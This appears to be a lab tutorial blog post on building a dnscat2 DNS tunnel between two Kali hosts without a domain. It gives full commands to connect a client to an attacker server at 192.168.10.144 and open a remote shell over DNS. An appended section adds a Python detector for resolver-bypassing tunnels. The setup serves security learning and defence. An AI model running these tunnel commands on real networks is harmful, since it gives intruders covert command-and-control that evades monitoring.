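DNS tunneling with dnscat2 (operating without a domain name)

If a host can resolve domain names, or can reach an IP address with ping, you can also try carrying internal network traffic over the DNS protocol. With dnscat2, the server actively connects to the client.

Leaving a placeholder here for now: since I have no domain name, I use an IP address for the experiment to get to know the procedure, and I will keep improving this later.

Environment preparation

Server side (attacker IP: 192.168.10.144):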

root@kali:~# apt-get update
root@kali:~# apt-get -y install ruby-dev git make g++
root@kali:~# gem install bundler
root@kali:~# git clone https://github.com/iagox86/dnscat2.git

root@kali:~# cd dnscat2/server
root@kali:~/dnscat2/server# bundle install

Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your
bundle as root will break this application for all non-root users on this machine.        
Fetching gem metadata from https://rubygems.org/.......
Using bundler 2.1.4
Fetching ecdsa 1.2.0
Installing ecdsa 1.2.0
Fetching salsa20 0.1.1
Installing salsa20 0.1.1 with native extensions
Fetching sha3 1.0.1
Installing sha3 1.0.1 with native extensions
Fetching trollop 2.1.2
Installing trollop 2.1.2
Bundle complete! 4 Gemfile dependencies, 5 gems now installed.
Use `bundle info [gemname]` to see where a bundled gem is installed.

 

Compile the client on the second Kali machine

root@kali:~# git clone https://github.com/iagox86/dnscat2.git
root@kali:~# cd dnscat2/client
root@kali:~/dnscat2/client# make

Establishing the DNS tunnel

Attacker machine
root@kali:~/dnscat2/server# ruby ./dnscat2.rb

root@kali:~/dnscat2/client# ./dnscat --dns server=192.168.10.144 --secret=0f6da6ab6343bd9a278f02a1691e171d

Commands
dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

dnscat2> window -i 1

New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (kali) 1>
Type ? to see which commands are supported.
The shell command (on success a session numbered 2 is created; connect to it with window -i 2)
command (kali) 1> shell
Sent request to execute a shell
command (kali) 1> New window created: 2
Shell session created!
Type exit to quit.
The session command shows how many sessions there are.

dnscat2> session
0 :: main [active]
crypto-debug :: Debug window for crypto stuff []
dns1 :: DNS Driver running on 0.0.0.0:53 domains = [
]
1 :: command (kali) [encrypted and verified]
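
From the defender's side, the setup above shows up as a host sending DNS queries straight to an address that is not the sanctioned resolver. The following is an added example, not part of the original post or of dnscat2: it flags such client/resolver pairs in a query log. The log format, the approved resolver 192.168.10.2, the client addresses and the query names are constructed assumptions.

```python
import re
from collections import defaultdict

# Assumption: 192.168.10.2 stands in for the site's sanctioned resolver.
APPROVED_RESOLVERS = {"192.168.10.2"}
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")  # long all-hex label = encoded payload

# Constructed sample log: "client_ip resolver_ip qtype qname"
SAMPLE_LOG = """\
192.168.10.150 192.168.10.2 A www.example.com
192.168.10.150 192.168.10.2 AAAA www.example.com
192.168.10.151 192.168.10.144 TXT dnscat.9f3c01a2b4c5d6e7f8091a2b3c4d5e6f
192.168.10.151 192.168.10.144 CNAME dnscat.a10b2c3d4e5f60718293a4b5c6d7e8f9
192.168.10.151 192.168.10.144 MX dnscat.0b1c2d3e4f5061728394a5b6c7d8e9fa
192.168.10.151 192.168.10.144 TXT dnscat.77aa88bb99cc00dd11ee22ff33445566
192.168.10.152 192.168.10.144 A intranet.example.com
"""

def parse(log):
    """Yield (client, resolver, qtype, qname) from whitespace-separated lines."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == 4:
            yield tuple(parts)

def find_direct_tunnels(log, approved=APPROVED_RESOLVERS, min_queries=3):
    """Return {(client, resolver): stats} for pairs that bypass the approved
    resolvers AND send mostly unique names carrying long hex labels."""
    seen = defaultdict(lambda: {"queries": 0, "hex": 0, "names": set()})
    for client, resolver, qtype, qname in parse(log):
        if resolver in approved:
            continue  # normal path through the sanctioned resolver
        s = seen[(client, resolver)]
        s["queries"] += 1
        s["names"].add(qname.lower())
        if any(HEX_LABEL.match(label) for label in qname.lower().split(".")):
            s["hex"] += 1
    hits = {}
    for pair, s in seen.items():
        hex_ratio = s["hex"] / s["queries"]
        unique_ratio = len(s["names"]) / s["queries"]
        if s["queries"] >= min_queries and hex_ratio >= 0.8 and unique_ratio >= 0.8:
            hits[pair] = {"queries": s["queries"], "hex_ratio": hex_ratio}
    return hits

if __name__ == "__main__":
    for (client, resolver), info in find_direct_tunnels(SAMPLE_LOG).items():
        print(f"{client} -> {resolver}: {info}")
```

Blocking outbound UDP/TCP 53 to anything but the approved resolvers at the network edge removes this direct path entirely; the script is for finding hosts that already use it.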
